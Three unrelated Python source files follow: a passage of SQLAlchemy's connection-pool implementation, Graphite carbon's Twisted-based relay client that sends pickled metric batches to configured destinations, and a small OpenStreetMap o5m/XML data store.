self.__pool.logger.info(
"Connection %r exceeded timeout; recycling",
self.connection)
recycle = True
elif self.__pool._invalidate_time > self.starttime:
self.__pool.logger.info(
"Connection %r invalidated due to pool invalidation; " +
"recycling",
self.connection
)
recycle = True
elif self._soft_invalidate_time > self.starttime:
self.__pool.logger.info(
"Connection %r invalidated due to local soft invalidation; " +
"recycling",
self.connection
)
recycle = True
if recycle:
self.__close()
self.info.clear()
self.__connect()
return self.connection
def __close(self):
self.finalize_callback.clear()
if self.__pool.dispatch.close:
self.__pool.dispatch.close(self.connection, self)
self.__pool._close_connection(self.connection)
def __connect(self, first_connect_check=False):
pool = self.__pool
# ensure any existing connection is removed, so that if
# creator fails, this attribute stays None
self.connection = None
try:
self.starttime = time.time()
connection = pool._invoke_creator(self)
pool.logger.debug("Created new connection %r", connection)
self.connection = connection
except Exception as e:
pool.logger.debug("Error on connect(): %s", e)
raise
else:
if first_connect_check:
pool.dispatch.first_connect.\
for_modify(pool.dispatch).\
exec_once(self.connection, self)
if pool.dispatch.connect:
pool.dispatch.connect(self.connection, self)
def _finalize_fairy(connection, connection_record,
pool, ref, echo, fairy=None):
"""Cleanup for a :class:`._ConnectionFairy` whether or not it's already
been garbage collected.
"""
_refs.discard(connection_record)
if ref is not None and \
connection_record.fairy_ref is not ref:
return
if connection is not None:
if connection_record and echo:
pool.logger.debug("Connection %r being returned to pool",
connection)
try:
fairy = fairy or _ConnectionFairy(
connection, connection_record, echo)
assert fairy.connection is connection
fairy._reset(pool)
# Immediately close detached instances
if not connection_record:
if pool.dispatch.close_detached:
pool.dispatch.close_detached(connection)
pool._close_connection(connection)
except BaseException as e:
pool.logger.error(
"Exception during reset or similar", exc_info=True)
if connection_record:
connection_record.invalidate(e=e)
if not isinstance(e, Exception):
raise
if connection_record:
connection_record.checkin()
_refs = set()
class _ConnectionFairy(object):
"""Proxies a DBAPI connection and provides return-on-dereference
support.
This is an internal object used by the :class:`.Pool` implementation
to provide context management to a DBAPI connection delivered by
that :class:`.Pool`.
The name "fairy" is inspired by the fact that the
:class:`._ConnectionFairy` object's lifespan is transitory, as it lasts
only for the length of a specific DBAPI connection being checked out from
the pool, and additionally that as a transparent proxy, it is mostly
invisible.
.. seealso::
:class:`._ConnectionRecord`
"""
def __init__(self, dbapi_connection, connection_record, echo):
self.connection = dbapi_connection
self._connection_record = connection_record
self._echo = echo
connection = None
"""A reference to the actual DBAPI connection being tracked."""
_connection_record = None
"""A reference to the :class:`._ConnectionRecord` object associated
with the DBAPI connection.
This is currently an internal accessor which is subject to change.
"""
_reset_agent = None
"""Refer to an object with a ``.commit()`` and ``.rollback()`` method;
if non-None, the "reset-on-return" feature will call upon this object
rather than directly against the dialect-level do_rollback() and
do_commit() methods.
In practice, a :class:`.Connection` assigns a :class:`.Transaction` object
to this variable when one is in scope so that the :class:`.Transaction`
takes the job of committing or rolling back on return if
:meth:`.Connection.close` is called while the :class:`.Transaction`
still exists.
This is essentially an "event handler" of sorts but is simplified as an
instance variable both for performance/simplicity as well as that there
can only be one "reset agent" at a time.
"""
@classmethod
def _checkout(cls, pool, threadconns=None, fairy=None):
if not fairy:
fairy = _ConnectionRecord.checkout(pool)
fairy._pool = pool
fairy._counter = 0
if threadconns is not None:
threadconns.current = weakref.ref(fairy)
if fairy.connection is None:
raise exc.InvalidRequestError("This connection is closed")
fairy._counter += 1
if not pool.dispatch.checkout or fairy._counter != 1:
return fairy
# Pool listeners can trigger a reconnection on checkout
attempts = 2
while attempts > 0:
try:
pool.dispatch.checkout(fairy.connection,
fairy._connection_record,
fairy)
return fairy
except exc.DisconnectionError as e:
pool.logger.info(
"Disconnection detected on checkout: %s", e)
fairy._connection_record.invalidate(e)
try:
fairy.connection = \
fairy._connection_record.get_connection()
except:
with util.safe_reraise():
fairy._connection_record.checkin()
attempts -= 1
pool.logger.info("Reconnection attempts exhausted on checkout")
fairy.invalidate()
raise exc.InvalidRequestError("This connection is closed")
def _checkout_existing(self):
return _ConnectionFairy._checkout(self._pool, fairy=self)
def _checkin(self):
_finalize_fairy(self.connection, self._connection_record,
self._pool, None, self._echo, fairy=self)
self.connection = None
self._connection_record = None
_close = _checkin
def _reset(self, pool):
if pool.dispatch.reset:
pool.dispatch.reset(self, self._connection_record)
if pool._reset_on_return is reset_rollback:
if self._echo:
pool.logger.debug("Connection %s rollback-on-return%s",
self.connection,
", via agent"
if self._reset_agent else "")
if self._reset_agent:
self._reset_agent.rollback()
else:
pool._dialect.do_rollback(self)
elif pool._reset_on_return is reset_commit:
if self._echo:
pool.logger.debug("Connection %s commit-on-return%s",
self.connection,
", via agent"
if self._reset_agent else "")
if self._reset_agent:
self._reset_agent.commit()
else:
pool._dialect.do_commit(self)
@property
def _logger(self):
return self._pool.logger
@property
def is_valid(self):
"""Return True if this :class:`._ConnectionFairy` still refers
to an active DBAPI connection."""
return self.connection is not None
@util.memoized_property
def info(self):
"""Info dictionary associated with the underlying DBAPI connection
referred to by this :class:`.ConnectionFairy`, allowing user-defined
data to be associated with the connection.
The data here will follow along with the DBAPI connection including
after it is returned to the connection pool and used again
in subsequent instances of :class:`._ConnectionFairy`. It is shared
with the :attr:`._ConnectionRecord.info` and :attr:`.Connection.info`
accessors.
"""
return self._connection_record.info
def invalidate(self, e=None, soft=False):
"""Mark this connection as invalidated.
This method can be called directly, and is also called as a result
of the :meth:`.Connection.invalidate` method. When invoked,
the DBAPI connection is immediately closed and discarded from
further use by the pool. The invalidation mechanism proceeds
via the :meth:`._ConnectionRecord.invalidate` internal method.
:param e: an exception object indicating a reason for the invalidation.
:param soft: if True, the connection isn't closed; instead, this
connection will be recycled on next checkout.
.. versionadded:: 1.0.3
.. seealso::
:ref:`pool_connection_invalidation`
"""
if self.connection is None:
util.warn("Can't invalidate an already-closed connection.")
return
if self._connection_record:
self._connection_record.invalidate(e=e, soft=soft)
if not soft:
self.connection = None
self._checkin()
def cursor(self, *args, **kwargs):
"""Return a new DBAPI cursor for the underlying connection.
This method is a proxy for the ``connection.cursor()`` DBAPI
method.
"""
return self.connection.cursor(*args, **kwargs)
def __getattr__(self, key):
return getattr(self.connection, key)
def detach(self):
"""Separate this connection from its Pool.
This means that the connection will no longer be returned to the
pool when closed, and will instead be literally closed. The
containing ConnectionRecord is separated from the DB-API connection,
and will create a new connection when next used.
Note that any overall connection limiting constraints imposed by a
Pool implementation may be violated after a detach, as the detached
connection is removed from the pool's knowledge and control.
"""
if self._connection_record is not None:
rec = self._connection_record
_refs.remove(rec)
rec.fairy_ref = None
rec.connection = None
# TODO: should this be _return_conn?
self._pool._do_return_conn(self._connection_record)
self.info = self.info.copy()
self._connection_record = None
if self._pool.dispatch.detach:
self._pool.dispatch.detach(self.connection, rec)
def close(self):
self._counter -= 1
if self._counter == 0:
self._checkin()
class SingletonThreadPool(Pool):
"""A Pool that maintains one connection per thread.
Maintains one connection per each thread, never moving a connection to a
thread other than the one which it was created in.
.. warning:: the :class:`.SingletonThreadPool` will call ``.close()``
on arbitrary connections that exist beyond the size setting of
``pool_size``, e.g. if more unique **thread identities**
than what ``pool_size`` states are used. This cleanup is
non-deterministic and not sensitive to whether or not the connections
linked to those thread identities are currently in use.
:class:`.SingletonThreadPool` may be improved in a future release,
however in its current status it is generally used only for test
scenarios using a SQLite ``:memory:`` database and is not recommended
for production use.
Options are the same as those of :class:`.Pool`, as well as:
:param pool_size: The number of threads in which to maintain connections
at once. Defaults to five.
:class:`.SingletonThreadPool` is used by the SQLite dialect
automatically when a memory-based database is used.
See :ref:`sqlite_toplevel`.
"""
def __init__(self, creator, pool_size=5, **kw):
kw['use_threadlocal'] = True
Pool.__init__(self, creator, **kw)
self._conn = threading.local()
self._all_conns = set()
self.size = pool_size
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator,
pool_size=self.size,
recycle=self._recycle,
echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
"""Dispose of this pool."""
for conn in self._all_conns:
try:
conn.close()
except Exception:
# pysqlite won't even let you close a conn from a thread
# that didn't create it
pass
self._all_conns.clear()
def _cleanup(self):
while len(self._all_conns) >= self.size:
c = self._all_conns.pop()
c.close()
def status(self):
return "SingletonThreadPool id:%d size: %d" % \
(id(self), len(self._all_conns))
def _do_return_conn(self, conn):
pass
def _do_get(self):
try:
c = self._conn.current()
if c:
return c
except AttributeError:
pass
c = self._create_connection()
self._conn.current = weakref.ref(c)
if len(self._all_conns) >= self.size:
self._cleanup()
self._all_conns.add(c)
return c
class QueuePool(Pool):
"""A :class:`.Pool` that imposes a limit on the number of open connections.
:class:`.QueuePool` is the default pooling implementation used for
all :class:`.Engine` objects, unless the SQLite dialect is in use.
"""
def __init__(self, creator, pool_size=5, max_overflow=10, timeout=30,
**kw):
"""
Construct a QueuePool.
:param creator: a callable function that returns a DB-API
connection object, same as that of :paramref:`.Pool.creator`.
:param pool_size: The size of the pool to be maintained,
defaults to 5. This is the largest number of connections that
will be kept persistently in the pool. Note that the pool
begins with no connections; once this number of connections
is requested, that number of connections will remain.
``pool_size`` can be set to 0 to indicate no size limit; to
disable pooling, use a :class:`~sqlalchemy.pool.NullPool`
instead.
:param max_overflow: The maximum overflow size of the
pool. When the number of checked-out connections reaches the
size set in pool_size, additional connections will be
returned up to this limit. When those additional connections
are returned to the pool, they are disconnected and
discarded. It follows then that the total number of
simultaneous connections the pool will allow is pool_size +
`max_overflow`, and the total number of "sleeping"
connections the pool will allow is pool_size. `max_overflow`
can be set to -1 to indicate no overflow limit; no limit
will be placed on the total number of concurrent
connections. Defaults to 10.
:param timeout: The number of seconds to wait before giving up
on returning a connection. Defaults to 30.
:param \**kw: Other keyword arguments including
:paramref:`.Pool.recycle`, :paramref:`.Pool.echo`,
:paramref:`.Pool.reset_on_return` and others are passed to the
:class:`.Pool` constructor.
"""
Pool.__init__(self, creator, **kw)
self._pool = sqla_queue.Queue(pool_size)
self._overflow = 0 - pool_size
self._max_overflow = max_overflow
self._timeout = timeout
self._overflow_lock = threading.Lock()
def _do_return_conn(self, conn):
try:
self._pool.put(conn, False)
except sqla_queue.Full:
try:
conn.close()
finally:
self._dec_overflow()
def _do_get(self):
use_overflow = self._max_overflow > -1
try:
wait = use_overflow and self._overflow >= self._max_overflow
return self._pool.get(wait, self._timeout)
except sqla_queue.Empty:
if use_overflow and self._overflow >= self._max_overflow:
if not wait:
return self._do_get()
else:
raise exc.TimeoutError(
"QueuePool limit of size %d overflow %d reached, "
"connection timed out, timeout %d" %
(self.size(), self.overflow(), self._timeout))
if self._inc_overflow():
try:
return self._create_connection()
except:
with util.safe_reraise():
self._dec_overflow()
else:
return self._do_get()
def _inc_overflow(self):
if self._max_overflow == -1:
self._overflow += 1
return True
with self._overflow_lock:
if self._overflow < self._max_overflow:
self._overflow += 1
return True
else:
return False
def _dec_overflow(self):
if self._max_overflow == -1:
self._overflow -= 1
return True
with self._overflow_lock:
self._overflow -= 1
return True
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator, pool_size=self._pool.maxsize,
max_overflow=self._max_overflow,
timeout=self._timeout,
recycle=self._recycle, echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
while True:
try:
conn = self._pool.get(False)
conn.close()
except sqla_queue.Empty:
break
self._overflow = 0 - self.size()
self.logger.info("Pool disposed. %s", self.status())
def status(self):
return "Pool size: %d Connections in pool: %d "\
"Current Overflow: %d Current Checked out "\
"connections: %d" % (self.size(),
self.checkedin(),
self.overflow(),
self.checkedout())
def size(self):
return self._pool.maxsize
def checkedin(self):
return self._pool.qsize()
def overflow(self):
return self._overflow
def checkedout(self):
return self._pool.maxsize - self._pool.qsize() + self._overflow
class NullPool(Pool):
"""A Pool which does not pool connections.
Instead it literally opens and closes the underlying DB-API connection
per each connection open/close.
Reconnect-related functions such as ``recycle`` and connection
invalidation are not supported by this Pool implementation, since
no connections are held persistently.
.. versionchanged:: 0.7
:class:`.NullPool` is used by the SQlite dialect automatically
when a file-based database is used. See :ref:`sqlite_toplevel`.
"""
def status(self):
return "NullPool"
def _do_return_conn(self, conn):
conn.close()
def _do_get(self):
return self._create_connection()
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator,
recycle=self._recycle,
echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
pass
class StaticPool(Pool):
"""A Pool of exactly one connection, used for all requests.
Reconnect-related functions such as ``recycle`` and connection
invalidation (which is also used to support auto-reconnect) are not
currently supported by this Pool implementation but may be implemented
in a future release.
"""
@memoized_property
def _conn(self):
return self._creator()
@memoized_property
def connection(self):
return _ConnectionRecord(self)
def status(self):
return "StaticPool"
def dispose(self):
if '_conn' in self.__dict__:
self._conn.close()
self._conn = None
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch,
_dialect=self._dialect)
def _create_connection(self):
return self._conn
def _do_return_conn(self, conn):
pass
def _do_get(self):
return self.connection
class AssertionPool(Pool):
"""A :class:`.Pool` that allows at most one checked out connection at
any given time.
This will raise an exception if more than one connection is checked out
at a time. Useful for debugging code that is using more connections
than desired.
.. versionchanged:: 0.7
:class:`.AssertionPool` also logs a traceback of where
the original connection was checked out, and reports
this in the assertion error raised.
"""
def __init__(self, *args, **kw):
self._conn = None
self._checked_out = False
self._store_traceback = kw.pop('store_traceback', True)
self._checkout_traceback = None
Pool.__init__(self, *args, **kw)
def status(self):
return "AssertionPool"
def _do_return_conn(self, conn):
if not self._checked_out:
raise AssertionError("connection is not checked out")
self._checked_out = False
assert conn is self._conn
def dispose(self):
self._checked_out = False
if self._conn:
self._conn.close()
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator, echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch,
_dialect=self._dialect)
def _do_get(self):
if self._checked_out:
if self._checkout_traceback:
suffix = ' at:\n%s' % ''.join(
chop_traceback(self._checkout_traceback))
else:
suffix = ''
raise AssertionError("connection is already checked out" + suffix)
if not self._conn:
self._conn = self._create_connection()
self._checked_out = True
if self._store_traceback:
self._checkout_traceback = traceback.format_stack()
return self._conn
class _DBProxy(object):
"""Layers connection pooling behavior on top of a standard DB-API module.
Proxies a DB-API 2.0 connect() call to a connection pool keyed to the
specific connect parameters. Other functions and attributes are delegated
to the underlying DB-API module.
"""
def __init__(self, module, poolclass=QueuePool, **kw):
"""Initializes a new proxy.
module
a DB-API 2.0 module
poolclass
a Pool class, defaulting to QueuePool
Other parameters are sent to the Pool object's constructor.
"""
self.module = module
self.kw = kw
self.poolclass = poolclass
self.pools = {}
self._create_pool_mutex = threading.Lock()
def close(self):
for key in list(self.pools):
del self.pools[key]
def __del__(self):
self.close()
def __getattr__(self, key):
return getattr(self.module, key)
def get_pool(self, *args, **kw):
key = self._serialize(*args, **kw)
try:
return self.pools[key]
except KeyError:
self._create_pool_mutex.acquire()
try:
if key not in self.pools:
kw.pop('sa_pool_key', None)
pool = self.poolclass(
lambda: self.module.connect(*args, **kw), **self.kw)
self.pools[key] = pool
return pool
else:
return self.pools[key]
finally:
self._create_pool_mutex.release()
def connect(self, *args, **kw):
"""Activate a connection to the database.
Connect to the database using this DBProxy's module and the given
connect arguments. If the arguments match an existing pool, the
connection will be returned from the pool's current thread-local
connection instance, or if there is no thread-local connection
instance it will be checked out from the set of pooled connections.
If the pool has no available connections and allows new connections
to be created, a new database connection will be made.
"""
return self.get_pool(*args, **kw).connect()
def dispose(self, *args, **kw):
"""Dispose the pool referenced by the given connect arguments."""
key = self._serialize(*args, **kw)
try:
del self.pools[key]
except KeyError:
pass
def _serialize(self, *args, **kw):
if "sa_pool_key" in kw:
return kw['sa_pool_key']
return tuple(
list(args) +
[(k, kw[k]) for k in sorted(kw)]
)
|
|
from collections import deque
from time import time
from twisted.application.service import Service
from twisted.internet import reactor
from twisted.internet.defer import Deferred, DeferredList
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.protocols.basic import Int32StringReceiver
from carbon.conf import settings
from carbon.util import pickle
from carbon import instrumentation, log, pipeline, state
try:
import signal
except ImportError:
log.debug("Couldn't import signal module")
SEND_QUEUE_LOW_WATERMARK = settings.MAX_QUEUE_SIZE * settings.QUEUE_LOW_WATERMARK_PCT
class CarbonClientProtocol(Int32StringReceiver):
def connectionMade(self):
log.clients("%s::connectionMade" % self)
self.paused = False
self.connected = True
self.transport.registerProducer(self, streaming=True)
# Define internal metric names
self.lastResetTime = time()
self.destinationName = self.factory.destinationName
self.queuedUntilReady = 'destinations.%s.queuedUntilReady' % self.destinationName
self.sent = 'destinations.%s.sent' % self.destinationName
self.batchesSent = 'destinations.%s.batchesSent' % self.destinationName
self.slowConnectionReset = 'destinations.%s.slowConnectionReset' % self.destinationName
self.factory.connectionMade.callback(self)
self.factory.connectionMade = Deferred()
self.sendQueued()
def connectionLost(self, reason):
log.clients("%s::connectionLost %s" % (self, reason.getErrorMessage()))
self.connected = False
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
self.sendQueued()
def stopProducing(self):
self.disconnect()
def disconnect(self):
if self.connected:
self.transport.unregisterProducer()
self.transport.loseConnection()
self.connected = False
def sendDatapoint(self, metric, datapoint):
self.factory.enqueue(metric, datapoint)
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.sendQueued)
def _sendDatapoints(self, datapoints):
self.sendString(pickle.dumps(datapoints, protocol=-1))
instrumentation.increment(self.sent, len(datapoints))
instrumentation.increment(self.batchesSent)
self.factory.checkQueue()
def sendQueued(self):
"""This should be the only method that will be used to send stats.
In order to not hold the event loop and prevent stats from flowing
in while we send them out, this will process
settings.MAX_DATAPOINTS_PER_MESSAGE stats, send them, and if there
are still items in the queue, this will invoke reactor.callLater
to schedule another run of sendQueued after a reasonable enough time
for the destination to process what it has just received.
Given a queue size of one million stats, and using a
chained_invocation_delay of 0.0001 seconds, you'd get 1,000
sendQueued() invocations/second max. With a
settings.MAX_DATAPOINTS_PER_MESSAGE of 100, the rate of stats being
sent could theoretically be as high as 100,000 stats/sec, or
6,000,000 stats/minute. This is probably too high for a typical
receiver to handle.
In practice this theoretical max shouldn't be reached because
network delays should add an extra delay - probably on the order
of 10ms per send, so the queue should drain with an order of
minutes, which seems more realistic.
"""
chained_invocation_delay = 0.0001
queueSize = self.factory.queueSize
if self.paused:
instrumentation.max(self.queuedUntilReady, queueSize)
return
if not self.factory.hasQueuedDatapoints():
return
if settings.USE_RATIO_RESET is True:
if not self.connectionQualityMonitor():
self.resetConnectionForQualityReasons("Sent: {0}, Received: {1}".format(
instrumentation.prior_stats.get(self.sent, 0),
instrumentation.prior_stats.get('metricsReceived', 0)))
self._sendDatapoints(self.factory.takeSomeFromQueue())
if (self.factory.queueFull.called and
queueSize < SEND_QUEUE_LOW_WATERMARK):
if not self.factory.queueHasSpace.called:
self.factory.queueHasSpace.callback(queueSize)
if self.factory.hasQueuedDatapoints():
reactor.callLater(chained_invocation_delay, self.sendQueued)
def connectionQualityMonitor(self):
"""Checks to see if the connection for this factory appears to
be delivering stats at a speed close to what we're receiving
them at.
This is open to other measures of connection quality.
Returns a Bool
True means that quality is good, OR
True means that the total received is less than settings.MIN_RESET_STAT_FLOW
False means that quality is bad
"""
destination_sent = float(instrumentation.prior_stats.get(self.sent, 0))
total_received = float(instrumentation.prior_stats.get('metricsReceived', 0))
instrumentation.increment(self.slowConnectionReset, 0)
if total_received < settings.MIN_RESET_STAT_FLOW:
return True
if (destination_sent / total_received) < settings.MIN_RESET_RATIO:
return False
else:
return True
def resetConnectionForQualityReasons(self, reason):
"""Only re-sets the connection if it's been
settings.MIN_RESET_INTERVAL seconds since the last re-set.
Reason should be a string containing the quality info that led to
a re-set.
"""
if (time() - self.lastResetTime) < float(settings.MIN_RESET_INTERVAL):
return
else:
self.factory.connectedProtocol.disconnect()
self.lastResetTime = time()
instrumentation.increment(self.slowConnectionReset)
log.clients("%s:: resetConnectionForQualityReasons: %s" % (self, reason))
def __str__(self):
return 'CarbonClientProtocol(%s:%d:%s)' % (self.factory.destination)
__repr__ = __str__
class CarbonClientFactory(ReconnectingClientFactory):
maxDelay = 5
def __init__(self, destination):
self.destination = destination
self.destinationName = ('%s:%d:%s' % destination).replace('.', '_')
self.host, self.port, self.carbon_instance = destination
self.addr = (self.host, self.port)
self.started = False
# This factory maintains protocol state across reconnects
self.queue = deque() # Change to make this the sole source of metrics to be sent.
self.connectedProtocol = None
self.queueEmpty = Deferred()
self.queueFull = Deferred()
self.queueFull.addCallback(self.queueFullCallback)
self.queueHasSpace = Deferred()
self.queueHasSpace.addCallback(self.queueSpaceCallback)
self.connectFailed = Deferred()
self.connectionMade = Deferred()
self.connectionLost = Deferred()
# Define internal metric names
self.attemptedRelays = 'destinations.%s.attemptedRelays' % self.destinationName
self.fullQueueDrops = 'destinations.%s.fullQueueDrops' % self.destinationName
self.queuedUntilConnected = 'destinations.%s.queuedUntilConnected' % self.destinationName
self.relayMaxQueueLength = 'destinations.%s.relayMaxQueueLength' % self.destinationName
def queueFullCallback(self, result):
state.events.cacheFull()
log.clients('%s send queue is full (%d datapoints)' % (self, result))
def queueSpaceCallback(self, result):
if self.queueFull.called:
log.clients('%s send queue has space available' % self.connectedProtocol)
self.queueFull = Deferred()
self.queueFull.addCallback(self.queueFullCallback)
state.events.cacheSpaceAvailable()
self.queueHasSpace = Deferred()
self.queueHasSpace.addCallback(self.queueSpaceCallback)
def buildProtocol(self, addr):
self.connectedProtocol = CarbonClientProtocol()
self.connectedProtocol.factory = self
return self.connectedProtocol
def startConnecting(self): # calling this startFactory yields recursion problems
self.started = True
self.connector = reactor.connectTCP(self.host, self.port, self)
def stopConnecting(self):
self.started = False
self.stopTrying()
if self.connectedProtocol and self.connectedProtocol.connected:
return self.connectedProtocol.disconnect()
@property
def queueSize(self):
return len(self.queue)
def hasQueuedDatapoints(self):
return bool(self.queue)
def takeSomeFromQueue(self):
"""Use self.queue, which is a collections.deque, to pop up to
settings.MAX_DATAPOINTS_PER_MESSAGE items from the left of the
queue.
"""
def yield_max_datapoints():
for count in range(settings.MAX_DATAPOINTS_PER_MESSAGE):
try:
yield self.queue.popleft()
except IndexError:
raise StopIteration
return list(yield_max_datapoints())
def checkQueue(self):
"""Check if the queue is empty. If the queue isn't empty or
doesn't exist yet, then this will invoke the callback chain on the
self.queryEmpty Deferred chain with the argument 0, and will
re-set the queueEmpty callback chain with a new Deferred
object.
"""
if not self.queue:
self.queueEmpty.callback(0)
self.queueEmpty = Deferred()
def enqueue(self, metric, datapoint):
self.queue.append((metric, datapoint))
def enqueue_from_left(self, metric, datapoint):
self.queue.appendleft((metric, datapoint))
def sendDatapoint(self, metric, datapoint):
instrumentation.increment(self.attemptedRelays)
instrumentation.max(self.relayMaxQueueLength, self.queueSize)
if self.queueSize >= settings.MAX_QUEUE_SIZE:
if not self.queueFull.called:
self.queueFull.callback(self.queueSize)
instrumentation.increment(self.fullQueueDrops)
else:
self.enqueue(metric, datapoint)
if self.connectedProtocol:
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.connectedProtocol.sendQueued)
else:
instrumentation.increment(self.queuedUntilConnected)
def sendHighPriorityDatapoint(self, metric, datapoint):
"""The high priority datapoint is one relating to the carbon
daemon itself. It puts the datapoint on the left of the deque,
ahead of other stats, so that when the carbon-relay, specifically,
is overwhelmed its stats are more likely to make it through and
expose the issue at hand.
In addition, these stats go on the deque even when the max stats
capacity has been reached. This relies on not creating the deque
with a fixed max size.
"""
instrumentation.increment(self.attemptedRelays)
self.enqueue_from_left(metric, datapoint)
if self.connectedProtocol:
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.connectedProtocol.sendQueued)
else:
instrumentation.increment(self.queuedUntilConnected)
def startedConnecting(self, connector):
log.clients("%s::startedConnecting (%s:%d)" % (self, connector.host, connector.port))
def clientConnectionLost(self, connector, reason):
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
log.clients("%s::clientConnectionLost (%s:%d) %s" % (self, connector.host, connector.port, reason.getErrorMessage()))
self.connectedProtocol = None
self.connectionLost.callback(0)
self.connectionLost = Deferred()
def clientConnectionFailed(self, connector, reason):
ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)
log.clients("%s::clientConnectionFailed (%s:%d) %s" % (self, connector.host, connector.port, reason.getErrorMessage()))
self.connectFailed.callback(dict(connector=connector, reason=reason))
self.connectFailed = Deferred()
def disconnect(self):
self.queueEmpty.addCallback(lambda result: self.stopConnecting())
readyToStop = DeferredList(
[self.connectionLost, self.connectFailed],
fireOnOneCallback=True,
fireOnOneErrback=True)
self.checkQueue()
# This can happen if the client is stopped before a connection is ever made
if (not readyToStop.called) and (not self.started):
readyToStop.callback(None)
return readyToStop
def __str__(self):
return 'CarbonClientFactory(%s:%d:%s)' % self.destination
__repr__ = __str__
class CarbonClientManager(Service):
def __init__(self, router):
self.router = router
self.client_factories = {} # { destination : CarbonClientFactory() }
def startService(self):
if 'signal' in globals().keys():
log.debug("Installing SIG_IGN for SIGHUP")
signal.signal(signal.SIGHUP, signal.SIG_IGN)
Service.startService(self)
for factory in self.client_factories.values():
if not factory.started:
factory.startConnecting()
def stopService(self):
Service.stopService(self)
self.stopAllClients()
def startClient(self, destination):
if destination in self.client_factories:
return
log.clients("connecting to carbon daemon at %s:%d:%s" % destination)
self.router.addDestination(destination)
factory = self.client_factories[destination] = CarbonClientFactory(destination)
connectAttempted = DeferredList(
[factory.connectionMade, factory.connectFailed],
fireOnOneCallback=True,
fireOnOneErrback=True)
if self.running:
factory.startConnecting() # this can trigger & replace connectFailed
return connectAttempted
def stopClient(self, destination):
factory = self.client_factories.get(destination)
if factory is None:
return
self.router.removeDestination(destination)
stopCompleted = factory.disconnect()
stopCompleted.addCallback(lambda result: self.disconnectClient(destination))
return stopCompleted
def disconnectClient(self, destination):
factory = self.client_factories.pop(destination)
c = factory.connector
if c and c.state == 'connecting' and not factory.hasQueuedDatapoints():
c.stopConnecting()
def stopAllClients(self):
deferreds = []
for destination in list(self.client_factories):
deferreds.append( self.stopClient(destination) )
return DeferredList(deferreds)
def sendDatapoint(self, metric, datapoint):
for destination in self.router.getDestinations(metric):
self.client_factories[destination].sendDatapoint(metric, datapoint)
def sendHighPriorityDatapoint(self, metric, datapoint):
for destination in self.router.getDestinations(metric):
self.client_factories[destination].sendHighPriorityDatapoint(metric, datapoint)
def __str__(self):
return "<%s[%x]>" % (self.__class__.__name__, id(self))
class RelayProcessor(pipeline.Processor):
plugin_name = 'relay'
def process(self, metric, datapoint):
state.client_manager.sendDatapoint(metric, datapoint)
return pipeline.Processor.NO_OUTPUT
|
|
from __future__ import print_function
from . import o5m, osmxml
# ****** generic osm data store ******
class OsmData(object):
def __init__(self):
self.nodes=[]
self.ways=[]
self.relations=[]
self.bounds=[]
self.isDiff = False
def LoadFromO5m(self, fi):
dec = o5m.O5mDecode(fi)
dec.funcStoreNode = self.StoreNode
dec.funcStoreWay = self.StoreWay
dec.funcStoreRelation = self.StoreRelation
dec.funcStoreBounds = self.StoreBounds
dec.funcStoreIsDiff = self.StoreIsDiff
dec.DecodeHeader()
eof = False
while not eof:
eof = dec.DecodeNext()
def SaveToO5m(self, fi):
enc = o5m.O5mEncode(fi)
enc.StoreIsDiff(self.isDiff)
for bbox in self.bounds:
enc.StoreBounds(bbox)
for nodeData in self.nodes:
enc.StoreNode(*nodeData)
enc.Reset()
for wayData in self.ways:
enc.StoreWay(*wayData)
enc.Reset()
for relationData in self.relations:
enc.StoreRelation(*relationData)
enc.Finish()
def LoadFromOsmXml(self, fi):
dec = osmxml.OsmXmlDecode(fi)
dec.funcStoreNode = self.StoreNode
dec.funcStoreWay = self.StoreWay
dec.funcStoreRelation = self.StoreRelation
dec.funcStoreBounds = self.StoreBounds
dec.funcStoreIsDiff = self.StoreIsDiff
eof = False
while not eof:
eof = dec.DecodeNext()
def SaveToOsmXml(self, fi):
enc = osmxml.OsmXmlEncode(fi)
enc.StoreIsDiff(self.isDiff)
for bbox in self.bounds:
enc.StoreBounds(bbox)
for nodeData in self.nodes:
enc.StoreNode(*nodeData)
for wayData in self.ways:
enc.StoreWay(*wayData)
for relationData in self.relations:
enc.StoreRelation(*relationData)
enc.Finish()
def StoreNode(self, objectId, metaData, tags, pos):
self.nodes.append([objectId, metaData, tags, pos])
def StoreWay(self, objectId, metaData, tags, refs):
self.ways.append([objectId, metaData, tags, refs])
def StoreRelation(self, objectId, metaData, tags, refs):
self.relations.append([objectId, metaData, tags, refs])
def StoreBounds(self, bbox):
self.bounds.append(bbox)
def StoreIsDiff(self, isDiff):
self.isDiff = isDiff
class OsmChange(object):
def __init__(self):
self.create = OsmData()
self.modify = OsmData()
self.delete = OsmData()
self.dec = None
def ChangeStart(self, changeType):
#print "start", changeType
if changeType == "create":
self.dec.funcStoreNode = self.create.StoreNode
self.dec.funcStoreWay = self.create.StoreWay
self.dec.funcStoreRelation = self.create.StoreRelation
if changeType == "modify":
self.dec.funcStoreNode = self.modify.StoreNode
self.dec.funcStoreWay = self.modify.StoreWay
self.dec.funcStoreRelation = self.modify.StoreRelation
if changeType == "delete":
self.dec.funcStoreNode = self.delete.StoreNode
self.dec.funcStoreWay = self.delete.StoreWay
self.dec.funcStoreRelation = self.delete.StoreRelation
